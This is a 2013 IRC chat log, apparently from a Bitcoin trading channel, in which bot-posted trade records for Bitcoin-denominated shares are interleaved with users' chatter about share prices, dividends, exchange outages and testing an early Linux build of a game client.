20:06:06 [BTCTC] [ACTIVEMINING] 700 @ 0.004211 = 2.9477 BTC [-] Jul 31 20:06:09 [BTCTC] [ACTIVEMINING] 1000 @ 0.004211 = 4.211 BTC [-] Jul 31 20:06:11 [BTCTC] [ACTIVEMINING] 775 @ 0.00421 = 3.2628 BTC [-] Jul 31 20:06:12 [BTCTC] [ACTIVEMINING] 6000 @ 0.00418 = 25.08 BTC [-] Jul 31 20:06:14 [BTCTC] [ACTIVEMINING] 75 @ 0.004171 = 0.3128 BTC [-] Jul 31 20:06:16 [BTCTC] [ACTIVEMINING] 720 @ 0.004153 = 2.9902 BTC [-] Jul 31 20:06:18 [BTCTC] [ACTIVEMINING] 80 @ 0.004106 = 0.3285 BTC [-] Jul 31 20:06:20 [BTCTC] [ACTIVEMINING] 100 @ 0.004104 = 0.4104 BTC [-] Jul 31 20:06:22 [BTCTC] [ACTIVEMINING] 4421 @ 0.004103 = 18.1394 BTC [-] Jul 31 20:06:26 [BTCTC] [ACTIVEMINING] 2181 @ 0.004102 = 8.9465 BTC [-] Jul 31 20:06:28 [BTCTC] [ACTIVEMINING] 8000 @ 0.0041 = 32.8 BTC [-] Jul 31 20:06:30 [BTCTC] [ACTIVEMINING] 80 @ 0.00405 = 0.324 BTC [-] Jul 31 20:06:32 [BTCTC] [ACTIVEMINING] 25 @ 0.00405 = 0.1013 BTC [-] Jul 31 20:06:33 [HAVELOCK] [VTX] 2 @ 0.48 = 0.96 BTC [-] Jul 31 20:06:36 [HAVELOCK] [VTX] 2 @ 0.476 = 0.952 BTC [-] Jul 31 20:06:38 [BTCTC] [ACTIVEMINING] 1 @ 0.004 BTC [-] Jul 31 20:06:39 [HAVELOCK] [VTX] 11 @ 0.4741 = 5.2151 BTC [-] Jul 31 20:06:41 [HAVELOCK] [VTX] 5 @ 0.4620001 = 2.31 BTC [-] Jul 31 20:06:43 [HAVELOCK] [VTX] 4 @ 0.462 = 1.848 BTC [-] Jul 31 20:06:45 [BTCTC] [ACTIVEMINING] 2374 @ 0.004 = 9.496 BTC [-] Jul 31 20:06:46 [HAVELOCK] [VTX] 1 @ 0.461 BTC [-] Jul 31 20:06:49 [BTCTC] [ACTIVEMINING] 100 @ 0.004 = 0.4 BTC [-] Jul 31 20:06:54 sell it all! Jul 31 20:06:56 who was all thankful for being able to buy activescamming on the cheap earlier ? Jul 31 20:07:04 me in jacuzzi with mp, open inventory: http://live.coinbr.com/images/eulora2.png Jul 31 20:07:11 smidge Jul 31 20:07:52 [BTCTC] [ASICMINER-PT] 2 @ 3.913 = 7.826 BTC [-] Jul 31 20:08:00 something like "40% off all-time high is great deal" Jul 31 20:08:02 There isn't any sign of panic on the forums too Jul 31 20:08:38 what was the ath, 8 ? Jul 31 20:08:51 Chaang-Noi: it's the S.MG one Jul 31 20:09:09 nice Jul 31 20:09:10 [BTCTC] [ASICMINER-PT] 3 @ 3.913 = 11.739 BTC [-] Jul 31 20:09:13 [BTCTC] [ASICMINER-PT] 9 @ 3.911 = 35.199 BTC [-] Jul 31 20:09:15 [BTCTC] [ASICMINER-PT] 5 @ 3.91 = 19.55 BTC [-] Jul 31 20:09:18 [BTCTC] [ASICMINER-PT] 5 @ 3.905 = 19.525 BTC [-] Jul 31 20:09:22 [BTCTC] [ASICMINER-PT] 1 @ 3.901 BTC [-] Jul 31 20:09:28 [BTCTC] [ASICMINER-PT] 3 @ 3.9 = 11.7 BTC [-] Jul 31 20:09:32 [BTCTC] [ASICMINER-PT] 2 @ 3.9 = 7.8 BTC [-] Jul 31 20:09:50 of course they won't Jul 31 20:09:54 maybe. mircea_popescu is doing all himself,you know. changing sex where necessary. Jul 31 20:09:57 [BTCTC] [ASICMINER-PT] 2 @ 3.9 = 7.8 BTC [-] Jul 31 20:10:10 [BTCTC] [ASICMINER-PT] 2 @ 3.9 = 7.8 BTC [-] Jul 31 20:10:17 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 31 20:10:27 1 @ 4.4?? Jul 31 20:10:28 lmao Jul 31 20:10:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.039 = 0.39 BTC [-] Jul 31 20:10:40 must be a labcoin fan Jul 31 20:10:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.03863 = 0.1159 BTC [-] Jul 31 20:10:46 [HAVELOCK] [AM100] 1 @ 0.04000001 BTC [-] Jul 31 20:10:48 mircea_popescu: wow this is the first game client that I've seen REQUIRE linux libraries Jul 31 20:10:48 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 31 20:10:50 [HAVELOCK] [AM100] 198 @ 0.0395 = 7.821 BTC [-] Jul 31 20:10:52 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [-] Jul 31 20:10:53 [BTCTC] [TAT.ASICMINER] 490 @ 0.03862 = 18.9238 BTC [-] Jul 31 20:10:55 [HAVELOCK] [AM100] 2 @ 0.0395 = 0.079 BTC [-] Jul 31 20:10:57 [BTCTC] [TAT.ASICMINER] 39 @ 0.03862 = 1.5062 BTC [-] Jul 31 20:11:00 am divs are in Jul 31 20:11:04 and they're low :( Jul 31 20:11:07 [HAVELOCK] [AM1] 2 @ 3.95 = 7.9 BTC [-] Jul 31 20:11:11 [BTCTC] [ASICMINER-PT] 13 @ 3.9 = 50.7 BTC [-] Jul 31 20:11:19 thestringpuller so there. Jul 31 20:11:22 this must be how people feel trying to get steam games running in WINE Jul 31 20:11:25 ahh Jul 31 20:11:41 thanks chaang-noi Jul 31 20:11:49 [HAVELOCK] [HIM] 1 @ 0.151 BTC [-] Jul 31 20:11:51 [HAVELOCK] [HIM] 10 @ 0.151 = 1.51 BTC [-] Jul 31 20:12:06 if nothing else, we've extracted VENDETTA Jul 31 20:12:18 its all bad chaaaaang Jul 31 20:12:21 [BTCTC] [TAT.MINIGAME] 1 @ 0.000283 BTC [-] Jul 31 20:12:31 [HAVELOCK] [HIM] 8 @ 0.15 = 1.2 BTC [-] Jul 31 20:13:03 [HAVELOCK] [AM100] 1 @ 0.039 BTC [-] Jul 31 20:13:24 lower than last week :( Jul 31 20:14:10 by what .001 btc per share? Jul 31 20:14:25 yeh :( Jul 31 20:14:53 [BTCTC] [ASICMINER-PT] 1 @ 3.84 BTC [-] Jul 31 20:14:56 horrible. sell everything. Jul 31 20:15:01 exactly Jul 31 20:15:08 labcoin will save us Jul 31 20:15:09 [BTCTC] [TAT.MINIGAME] 2667 @ 0.0002806 = 0.7484 BTC [-] Jul 31 20:15:13 [BTCTC] [TAT.MINIGAME] 125 @ 0.0002805 = 0.0351 BTC [-] Jul 31 20:15:28 [BTCTC] [TAT.MINIGAME] 250 @ 0.0002802 = 0.0701 BTC [-] Jul 31 20:15:42 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002801 = 0.0028 BTC [-] Jul 31 20:15:45 [BTCTC] [TAT.MINIGAME] 18811 @ 0.00028 = 5.2671 BTC [-] Jul 31 20:15:47 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [-] Jul 31 20:15:48 MG has so much equity, no wonder it's trading so high. Jul 31 20:16:11 [HAVELOCK] [HIM] 2 @ 0.15 = 0.3 BTC [-] Jul 31 20:16:13 [MPEX] [S.MG] 3442 @ 0.0002675 = 0.9207 BTC [+] Jul 31 20:16:16 mircea_popescu: do you hear me shouting at distance? Jul 31 20:16:28 lol i died Jul 31 20:16:39 jurov yeah i saw you, but i can't shout myseklf cause too noob Jul 31 20:16:39 [BTCTC] [ASICMINER-PT] 3 @ 3.84 = 11.52 BTC [-] Jul 31 20:16:42 [BTCTC] [ASICMINER-PT] 1 @ 3.83 BTC [-] Jul 31 20:17:07 needs better collision detection :D Jul 31 20:17:21 why you say ? Jul 31 20:17:26 lol good 'ol crystal space Jul 31 20:17:30 [BTCTC] [BASIC-MINING] 3 @ 0.3825 = 1.1475 BTC [-] Jul 31 20:17:35 this shit brings me back Jul 31 20:17:41 hey mircea_popescu Jul 31 20:17:44 [HAVELOCK] [HIM] 1 @ 0.133 BTC [-] Jul 31 20:17:47 [BTCTC] [ASICMINER-PT] 2 @ 3.81 = 7.62 BTC [-] Jul 31 20:17:48 sup Jul 31 20:17:50 [BTCTC] [ASICMINER-PT] 2 @ 3.81 = 7.62 BTC [-] Jul 31 20:17:53 [HAVELOCK] [HIM] 2 @ 0.1321 = 0.2642 BTC [-] Jul 31 20:18:10 [HAVELOCK] [HIM] 2 @ 0.131 = 0.262 BTC [-] Jul 31 20:18:12 can't find any corpse Jul 31 20:18:13 [HAVELOCK] [AM100] 7 @ 0.039 = 0.273 BTC [+] Jul 31 20:18:14 [BTCTC] [ASICMINER-PT] 2 @ 3.82 = 7.64 BTC [+] Jul 31 20:18:17 to loot Jul 31 20:18:19 i respawned Jul 31 20:18:22 can you find me now ? Jul 31 20:18:43 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [+] Jul 31 20:18:44 [BTCTC] [BASIC-MINING] 7 @ 0.3825 = 2.6775 BTC [-] Jul 31 20:18:45 [HAVELOCK] [HIM] 3 @ 0.13001001 = 0.39 BTC [-] Jul 31 20:18:47 (middle button moves cam) Jul 31 20:19:16 [BTCTC] [ASICMINER-PT] 1 @ 3.802 BTC [-] Jul 31 20:19:19 [BTCTC] [TAT.MINIGAME] 1089 @ 0.00028 = 0.3049 BTC [-] Jul 31 20:19:21 [BTCTC] [ACTIVEMINING] 100 @ 0.004012 = 0.4012 BTC [+] Jul 31 20:19:22 [BTCTC] [ASICMINER-PT] 2 @ 3.801 = 7.602 BTC [-] Jul 31 20:19:24 [BTCTC] [TAT.MINIGAME] 10 @ 0.00028 = 0.0028 BTC [-] Jul 31 20:19:26 [BTCTC] [ACTIVEMINING] 400 @ 0.004001 = 1.6004 BTC [-] Jul 31 20:19:28 [BTCTC] [ACTIVEMINING] 20 @ 0.004799 = 0.096 BTC [+] Jul 31 20:19:30 [BTCTC] [ASICMINER-PT] 5 @ 3.801 = 19.005 BTC [-] Jul 31 20:19:50 [BTCTC] [ASICMINER-PT] 1 @ 3.801 BTC [-] Jul 31 20:19:51 hardly. i need to come close and mouseover to see names Jul 31 20:19:55 [BTCTC] [BASIC-MINING] 4 @ 0.3625 = 1.45 BTC [-] Jul 31 20:20:02 [BTCTC] [ASICMINER-PT] 2 @ 3.801 = 7.602 BTC [-] Jul 31 20:20:41 this game makes for excellent hide and seek Jul 31 20:20:55 [BTCTC] [TAT.ASICMINER] 24 @ 0.03861 = 0.9266 BTC [-] Jul 31 20:21:07 [BTCTC] [TAT.ASICMINER] 40 @ 0.03861 = 1.5444 BTC [-] Jul 31 20:21:09 [BTCTC] [ACTIVEMINING] 25 @ 0.004103 = 0.1026 BTC [-] Jul 31 20:21:10 [BTCTC] [ASICMINER-PT] 9 @ 3.805 = 34.245 BTC [+] Jul 31 20:21:14 [BTCTC] [ACTIVEMINING] 189 @ 0.004102 = 0.7753 BTC [-] Jul 31 20:21:18 [BTCTC] [ASICMINER-PT] 2 @ 4.45 = 8.9 BTC [+] Jul 31 20:21:37 [BTCTC] [TAT.ASICMINER] 29 @ 0.03861 = 1.1197 BTC [-] Jul 31 20:21:39 [BTCTC] [TAT.ASICMINER] 21 @ 0.03861 = 0.8108 BTC [-] Jul 31 20:21:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.0386 = 0.386 BTC [-] Jul 31 20:21:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.0386 = 0.386 BTC [-] Jul 31 20:21:48 lol Jul 31 20:21:55 [BTCTC] [TAT.ASICMINER] 55 @ 0.0382 = 2.101 BTC [-] Jul 31 20:22:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.03801 = 0.3801 BTC [-] Jul 31 20:22:18 [BTCTC] [ACTIVEMINING] 25 @ 0.004597 = 0.1149 BTC [+] Jul 31 20:22:21 [BTCTC] [TAT.ASICMINER] 20 @ 0.038 = 0.76 BTC [-] Jul 31 20:22:38 [BTCTC] [BASIC-MINING] 1 @ 0.3622 BTC [-] Jul 31 20:22:42 [HAVELOCK] [AM100] 58 @ 0.0386001 = 2.2388 BTC [-] Jul 31 20:22:44 [HAVELOCK] [AM100] 65 @ 0.03851 = 2.5032 BTC [-] Jul 31 20:22:45 mircea_popescu: are all the libraries self contained or do I gotta install any new packages? Jul 31 20:22:45 [HAVELOCK] [AM100] 1 @ 0.0385 BTC [-] Jul 31 20:22:47 [HAVELOCK] [AM100] 51 @ 0.0385 = 1.9635 BTC [-] Jul 31 20:22:49 [HAVELOCK] [AM100] 11 @ 0.03841 = 0.4225 BTC [-] Jul 31 20:22:51 [HAVELOCK] [AM100] 4 @ 0.03830031 = 0.1532 BTC [-] Jul 31 20:22:53 I guess I should be asking jurov that since he just installed Jul 31 20:22:53 [HAVELOCK] [AM100] 1 @ 0.0383 BTC [-] Jul 31 20:22:55 [HAVELOCK] [AM100] 70 @ 0.03821 = 2.6747 BTC [-] Jul 31 20:22:57 [HAVELOCK] [AM100] 999 @ 0.0382 = 38.1618 BTC [-] Jul 31 20:23:00 [BTCTC] [TAT.ASICMINER] 14 @ 0.0386 = 0.5404 BTC [+] Jul 31 20:23:06 jurov can you hear me talk ? :D Jul 31 20:23:13 [HAVELOCK] [AM100] 1 @ 0.0381 BTC [-] Jul 31 20:23:15 [HAVELOCK] [AM100] 125 @ 0.038 = 4.75 BTC [-] Jul 31 20:23:15 thestringpuller ideally should all be static Jul 31 20:23:17 [HAVELOCK] [AM100] 1 @ 0.0379 BTC [-] Jul 31 20:23:18 [HAVELOCK] [AM100] 1 @ 0.0378 BTC [-] Jul 31 20:23:20 but this is what i have you folks for Jul 31 20:23:20 [HAVELOCK] [AM100] 4 @ 0.0378 = 0.1512 BTC [-] Jul 31 20:23:22 [HAVELOCK] [AM100] 1 @ 0.0377 BTC [-] Jul 31 20:23:24 [HAVELOCK] [AM100] 1 @ 0.0375 BTC [-] Jul 31 20:23:26 [HAVELOCK] [AM100] 1 @ 0.0373 BTC [-] Jul 31 20:23:28 [HAVELOCK] [AM100] 1 @ 0.0371 BTC [-] Jul 31 20:23:30 [HAVELOCK] [AM100] 1 @ 0.0369 BTC [-] Jul 31 20:23:32 [HAVELOCK] [AM100] 1 @ 0.0367 BTC [-] Jul 31 20:23:45 [BTCTC] [COGNITIVE] 1 @ 0.386 BTC [-] Jul 31 20:23:47 [BTCTC] [COGNITIVE] 4 @ 0.3852 = 1.5408 BTC [-] Jul 31 20:23:59 mircea_popescu: nope Jul 31 20:24:04 o seriously ? Jul 31 20:24:04 [BTCTC] [COGNITIVE] 4 @ 0.3851 = 1.5404 BTC [-] Jul 31 20:24:05 [BTCTC] [BASIC-MINING] 1 @ 0.3606 BTC [-] Jul 31 20:24:11 [BTCTC] [BASIC-MINING] 9 @ 0.3605 = 3.2445 BTC [-] Jul 31 20:24:20 it doesn't seem to be dropping packets tho, i suppose the zoning is weird on the map Jul 31 20:24:31 [BTCTC] [DMS.SELLING] 1 @ 0.0243 BTC [+] Jul 31 20:24:40 thestringpuller: i have pretty standard gentoo box with opensource ati 3d driver Jul 31 20:24:45 [MPEX] [S.MPOE] 7314 @ 0.00079398 = 5.8072 BTC [-] Jul 31 20:24:49 [BTCTC] [BASIC-MINING] 1 @ 0.3986 BTC [+] Jul 31 20:25:42 [BTCTC] [ACTIVEMINING] 9 @ 0.004588 = 0.0413 BTC [-] Jul 31 20:25:43 [BTCTC] [BASIC-MINING] 7 @ 0.375 = 2.625 BTC [-] Jul 31 20:26:03 wow Jul 31 20:26:08 now in room 2. the landscape is broken Jul 31 20:26:28 [BTCTC] [ACTIVEMINING] 1 @ 0.006235 BTC [+] Jul 31 20:26:56 umm Jul 31 20:26:58 there's no room 2. Jul 31 20:27:41 [BTCTC] [TAT.ASICMINER] 48 @ 0.04048 = 1.943 BTC [+] Jul 31 20:27:44 i went thru the cave and it said "you discovered npc room 2 and gained 1000 experience" Jul 31 20:28:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.04049 = 0.2025 BTC [+] Jul 31 20:28:43 meanwhile, i tried to attack some npcs and it said "you can't" Jul 31 20:28:53 well... Jul 31 20:28:57 be glad it didn't say you cunt. Jul 31 20:29:31 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [+] Jul 31 20:29:41 [HAVELOCK] [AM100] 1 @ 0.0389 BTC [+] Jul 31 20:29:48 [BTCTC] [TAT.ASICMINER] 50 @ 0.04049 = 2.0245 BTC [+] Jul 31 20:29:52 [HAVELOCK] [AM100] 118 @ 0.039 = 4.602 BTC [+] Jul 31 20:30:00 http://siliconangle.com/blog/2013/07/31/bitcoin-weekly-2013-july-31-thailand-bans-bitcoin-bitcoin-movie-kicked-from-kickstarter-data-is-here-to-self-regulate-btc/ Jul 31 20:30:09 i cant even attack you.. what a shame Jul 31 20:30:11 lol Jul 31 20:30:11 [BTCTC] [BASIC-MINING] 6 @ 0.375 = 2.25 BTC [-] Jul 31 20:30:16 [HAVELOCK] [AM100] 1 @ 0.0391 BTC [+] Jul 31 20:30:18 [HAVELOCK] [AM100] 1 @ 0.0393 BTC [+] Jul 31 20:30:21 [HAVELOCK] [AM100] 1 @ 0.0395 BTC [+] Jul 31 20:30:23 [HAVELOCK] [AM100] 1 @ 0.0397 BTC [+] Jul 31 20:30:25 they've linked to my eve corp. Jul 31 20:30:31 i wonder what the guy does when he discovers mpex. Jul 31 20:31:04 [HAVELOCK] [AM100] 1 @ 0.0399 BTC [+] Jul 31 20:31:07 [HAVELOCK] [AM100] 1 @ 0.0401 BTC [+] Jul 31 20:31:08 [HAVELOCK] [AM100] 1 @ 0.0403 BTC [+] Jul 31 20:31:10 [HAVELOCK] [AM100] 19 @ 0.0404 = 0.7676 BTC [+] Jul 31 20:31:12 [HAVELOCK] [AM100] 78 @ 0.0404999 = 3.159 BTC [+] Jul 31 20:31:16 [BTCTC] [ASICMINER-PT] 1 @ 3.876 BTC [-] Jul 31 20:31:31 [HAVELOCK] [AM100] 3 @ 0.0404999 = 0.1215 BTC [+] Jul 31 20:31:42 [HAVELOCK] [AM100] 5 @ 0.0404999 = 0.2025 BTC [+] Jul 31 20:31:46 jurov: did you just chmod the binary? Jul 31 20:31:50 [HAVELOCK] [AM100] 5 @ 0.0404999 = 0.2025 BTC [+] Jul 31 20:31:50 or did you do something else Jul 31 20:31:52 getting your error Jul 31 20:32:03 [HAVELOCK] [AM100] 5 @ 0.0404999 = 0.2025 BTC [+] Jul 31 20:32:16 i added the user into video group Jul 31 20:32:25 so that it can install rootkit into my video card Jul 31 20:32:27 oh no wonder Jul 31 20:32:30 it's a 64 bit binar Jul 31 20:32:31 binary Jul 31 20:32:40 mircea_popescu: can I just compile this shit from sourse? Jul 31 20:32:42 source* Jul 31 20:32:52 [HAVELOCK] [AM100] 5 @ 0.0404999 = 0.2025 BTC [+] Jul 31 20:32:59 you have 32bit system? Jul 31 20:33:01 [HAVELOCK] [AM100] 5 @ 0.0404999 = 0.2025 BTC [+] Jul 31 20:33:08 Yup. I'm old school. Jul 31 20:33:14 It's 64 bit but I'm running a 32 bit os Jul 31 20:33:40 thestringpuller you probably should be able to yes Jul 31 20:33:42 xp? Jul 31 20:33:44 [BTCTC] [TAT.ASICMINER] 3 @ 0.03992 = 0.1198 BTC [-] Jul 31 20:33:46 [BTCTC] [BASIC-MINING] 3 @ 0.375 = 1.125 BTC [-] Jul 31 20:33:51 mircea_popescu: where is the client source tree? Jul 31 20:33:56 if that is open Jul 31 20:34:18 it's open but not published yet Jul 31 20:34:32 should be in all those snvs and crap in the package Jul 31 20:35:22 I actually don't see the svn hooks Jul 31 20:35:30 gimme a sec I'll see if svn can find it Jul 31 20:35:57 it's a little messy atm, will be getting cleanned up and everything Jul 31 20:36:09 but atm teh devteam is like sleeping and drinking and whatnot Jul 31 20:36:31 i was just wondering, cause I'ma have to compile everything from source, including the libs to make it work with a 32 bit OS Jul 31 20:36:46 it will run on windows though with cygwin it looks like Jul 31 20:37:02 or just simmer and i'llget a 32 bit thing made tomorro.next day Jul 31 20:37:35 BTCTC down for anyone else? Jul 31 20:37:49 cool. it'll be on trilema comments? Jul 31 20:37:50 frb it's been up/down for the past...jmmm... week maybe ? Jul 31 20:37:59 I mean right now :-) Jul 31 20:38:00 thestringpuller prolly make an update on that article Jul 31 20:38:01 [BTCTC] [ACTIVEMINING] 25 @ 0.00421 = 0.1053 BTC [-] Jul 31 20:38:06 k Jul 31 20:39:07 [BTCTC] [ASICMINER-PT] 1 @ 3.966 BTC [+] Jul 31 20:40:18 altho, having independenty ppl compile is great tbh. Jul 31 20:40:34 just need to sort all the codeguts out and put it in some semblance of humane fiorm Jul 31 20:41:27 mircea_popescu: just downloaded.. do i need you to make me an account? Jul 31 20:41:35 [BTCTC] [TAT.ASICMINER] 28 @ 0.04049 = 1.1337 BTC [+] Jul 31 20:41:55 topace yeah Jul 31 20:42:02 well hook me up yo! Jul 31 20:42:13 i cant see it on steam store Jul 31 20:42:19 lol Jul 31 20:42:30 VanCleef dude, do you realise this was announced like... a month ago ? Jul 31 20:43:17 where is the spawn point i should expect topace? Jul 31 20:43:29 jurov no spawn ganking! Jul 31 20:44:03 btw, let's see which one of you finds me :D Jul 31 20:44:50 when will the iOS version be ready? Jul 31 20:45:59 found him. he's after you nao Jul 31 20:46:34 heh i instinctively went back to my WoW controls.. no right mouse button straffe? Jul 31 20:47:07 lol Jul 31 20:47:55 [BTCTC] [BASIC-MINING] 26 @ 0.3605 = 9.373 BTC [-] Jul 31 20:47:57 ThickAsThieves what's ios again ? Jul 31 20:48:28 ps4? Jul 31 20:49:11 ios is iPad/iPhone stuff Jul 31 20:49:32 o, the webcam things Jul 31 20:53:34 ;;buy 3.5 btc at {mtgoxlast} PPUSD Jul 31 20:53:35 Order id 17154 created. Jul 31 20:53:47 this guy learns fast huh Jul 31 20:54:47 xD Jul 31 20:56:00 [BTCTC] [RSM] 1 @ 0.01353 BTC [+] Jul 31 21:01:36 . Jul 31 21:01:39 sup dude? Jul 31 21:02:19 [BTCTC] [ACTIVEMINING] 8 @ 0.004103 = 0.0328 BTC [-] Jul 31 21:02:25 [BTCTC] [TAT.ASICMINER] 11 @ 0.0405 = 0.4455 BTC [+] Jul 31 21:02:58 activemining tanking had :( Jul 31 21:03:08 sup Biggy Jul 31 21:03:17 you bought this shitty share ? Jul 31 21:03:54 [HAVELOCK] [AM100] 3 @ 0.0371 = 0.1113 BTC [-] Jul 31 21:03:56 it's still avbout 5000% overpriced. Jul 31 21:03:56 [HAVELOCK] [AM100] 2 @ 0.037 = 0.074 BTC [-] Jul 31 21:03:58 [HAVELOCK] [AM100] 2 @ 0.0369 = 0.0738 BTC [-] Jul 31 21:04:00 [HAVELOCK] [AM100] 2 @ 0.0368 = 0.0736 BTC [-] Jul 31 21:04:02 [HAVELOCK] [AM100] 1 @ 0.0367 BTC [-] Jul 31 21:04:04 [HAVELOCK] [AM100] 92 @ 0.0366001 = 3.3672 BTC [-] Jul 31 21:04:05 [HAVELOCK] [AM100] 121 @ 0.0366 = 4.4286 BTC [-] Jul 31 21:04:42 Apocalyptic: Yeah. Jul 31 21:04:45 I liked the read of it. Jul 31 21:04:49 But... now... :/ Jul 31 21:07:19 trying to buy me a weapon... no cigar Jul 31 21:07:26 [BTCTC] [ASICMINER-PT] 1 @ 3.878 BTC [-] Jul 31 21:09:13 [BTCTC] [BASIC-MINING] 8 @ 0.399 = 3.192 BTC [+] Jul 31 21:10:05 jurov why so violent Jul 31 21:10:35 it's meant ust for defense Jul 31 21:10:39 *just Jul 31 21:11:53 [HAVELOCK] [AM100] 2 @ 0.0385 = 0.077 BTC [+] Jul 31 21:11:56 [HAVELOCK] [AM100] 2 @ 0.0366 = 0.0732 BTC [-] Jul 31 21:13:03 oic Jul 31 21:13:11 peep Jul 31 21:13:12 anyone know where the gdice money is? Jul 31 21:13:22 what's gdice Jul 31 21:13:36 satoshi dice Jul 31 21:13:43 laque: it's in deadterra's wallet Jul 31 21:14:06 unless he messed withdrawal again Jul 31 21:14:33 how long will it sit in his wallet? Jul 31 21:14:55 [MPEX] [S.MG] 14801 @ 0.000269 = 3.9815 BTC [+] Jul 31 21:15:06 ask him when he goes out of hiding. even to this channel he used ukyo as middleman Jul 31 21:15:10 o, this the pt guy who was on vacation ? Jul 31 21:16:16 yes Jul 31 21:18:03 kakobrekla hey is this 1st time > 150 ? Jul 31 21:18:15 what? Jul 31 21:18:18 ;;ticker Jul 31 21:18:19 MtGox BTCUSD ticker | Best bid: 105.00010, Best ask: 105.62010, Bid-ask spread: 0.62000, Last trade: 105.00011, 24 hour volume: 55355.75164641, 24 hour low: 101.62487, 24 hour high: 111.65202, 24 hour vwap: 107.34530 Jul 31 21:19:10 ken slaughter some 10 years ago: http://i.imgur.com/PJB613N.jpg Jul 31 21:19:54 >Livin' la video loca Jul 31 21:19:56 lol Jul 31 21:20:12 mircea_popescu ? Jul 31 21:20:22 ah Jul 31 21:20:27 i think no Jul 31 21:20:40 [BTCTC] [BFMINES] 1 @ 0.003999 BTC [-] Jul 31 21:20:46 i think it was over 150 but sub 160 Jul 31 21:20:47 a ok Jul 31 21:21:08 that was above 200$ Jul 31 21:21:22 at that time. Jul 31 21:22:27 [HAVELOCK] [AM100] 15 @ 0.0382 = 0.573 BTC [+] Jul 31 21:22:43 btct down.. Jul 31 21:22:56 wonder if this IPO will ever happen.. Jul 31 21:23:59 here it's up Jul 31 21:24:01 [HAVELOCK] [AM1] [PAID] 11.63651368 BTC to 626 shares, 1858868 satoshi per share Jul 31 21:24:08 really? Jul 31 21:24:09 [BTCTC] [TAT.ASICMINER] 2 @ 0.0405 = 0.081 BTC [+] Jul 31 21:24:11 hmm Jul 31 21:24:14 [HAVELOCK] [AM100] [PAID] 44.17787348 BTC to 250`172 shares, 17659 satoshi per share Jul 31 21:24:29 bitcointalk.org is very slow for me, too Jul 31 21:24:53 Been out of touch for a while so apologies if this has been covered, but http://bitcoincharts.com/markets/currencies/ is up and I don't see mpex bot options quotes. What have I missed? Jul 31 21:25:17 $avg Jul 31 21:25:18 mircea_popescu: 103.52 Jul 31 21:25:22 seems fine ? no ? Jul 31 21:25:47 I mean bid/ask on http://mpex.co/ and coinbr? Jul 31 21:25:56 [HAVELOCK] [SDSTM] 3 @ 0.00888 = 0.0266 BTC [-] Jul 31 21:25:57 They all say n/a Jul 31 21:25:59 empty order book Jul 31 21:26:03 o. Jul 31 21:26:11 well sometimes old orders expire before new are put in Jul 31 21:26:19 usually resolves itself within a coupla minutes Jul 31 21:26:26 [HAVELOCK] [SMG] 12 @ 0.0002693 = 0.0032 BTC [+] Jul 31 21:26:41 otherwise, it's possibnle that while the site is up, nevertheless the connection from mpexbot didn't work out. that'll put it out for ~15 Jul 31 21:27:06 [HAVELOCK] [AM100] 4 @ 0.0382 = 0.1528 BTC [+] Jul 31 21:27:08 [HAVELOCK] [AM100] 3 @ 0.0382 = 0.1146 BTC [+] Jul 31 21:27:21 [BTCTC] [ACTIVEMINING] 25 @ 0.004101 = 0.1025 BTC [-] Jul 31 21:27:23 Right, I'll check again later... thanks gentlemen. Jul 31 21:27:35 !depth O.USD.C104T Jul 31 21:27:41 [HAVELOCK] [AM100] 2 @ 0.0382 = 0.0764 BTC [+] Jul 31 21:27:52 $depth O.USD.C104T Jul 31 21:27:53 jurov: An error has occurred and has been logged. Please contact this bot's administrator for more information. Jul 31 21:28:01 lol Jul 31 21:28:51 [HAVELOCK] [AM100] 1 @ 0.0385 BTC [+] Jul 31 21:29:43 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.002711 = 0.0163 BTC [-] Jul 31 21:29:45 [HAVELOCK] [AM100] 5 @ 0.0385 = 0.1925 BTC [+] Jul 31 21:30:16 wish i could use btct Jul 31 21:30:20 been trying to place a sell for 10 minutes Jul 31 21:30:26 all i get is lock error msgs Jul 31 21:30:30 [BTCTC] [ASICMINER-PT] 1 @ 3.88 BTC [+] Jul 31 21:31:03 why are other peoples orders going through Jul 31 21:31:04 sigh Jul 31 21:31:17 he says he's switch db systems Jul 31 21:31:20 switching Jul 31 21:31:46 [BTCTC] [TAT.MINIGAME] 2690 @ 0.0002724 = 0.7328 BTC [-] Jul 31 21:32:07 and he doesn't halt trading and order placing ? Jul 31 21:32:30 [BTCTC] [TAT.ASICMINER] 23 @ 0.04 = 0.92 BTC [-] Jul 31 21:33:00 [HAVELOCK] [AM100] 8 @ 0.0385 = 0.308 BTC [+] Jul 31 21:33:34 [BTCTC] [ACTIVEMINING] 1 @ 0.004498 BTC [+] Jul 31 21:33:38 [HAVELOCK] [AM100] 17 @ 0.0385 = 0.6545 BTC [+] Jul 31 21:33:44 [BTCTC] [DMS.SELLING] 200 @ 0.022 = 4.4 BTC [-] Jul 31 21:33:45 [BTCTC] [LTC-ATF.B2] 9 @ 0.01011 = 0.091 BTC [-] Jul 31 21:33:47 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [+] Jul 31 21:33:49 [BTCTC] [BITVPS] 1 @ 0.0017 BTC [+] Jul 31 21:33:51 [BTCTC] [DMS.MINING] 3 @ 0.008073 = 0.0242 BTC [+] Jul 31 21:33:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0381 BTC [-] Jul 31 21:33:54 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.002711 = 0.244 BTC [-] Jul 31 21:33:55 [HAVELOCK] [AM100] 2 @ 0.0391 = 0.0782 BTC [+] Jul 31 21:33:57 [BTCTC] [COGNITIVE] 13 @ 0.41 = 5.33 BTC [+] Jul 31 21:33:58 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Jul 31 21:33:58 submitted my 14th sell request Jul 31 21:33:58 [HAVELOCK] [SMG] 68 @ 0.0002693 = 0.0183 BTC [+] Jul 31 21:34:00 [HAVELOCK] 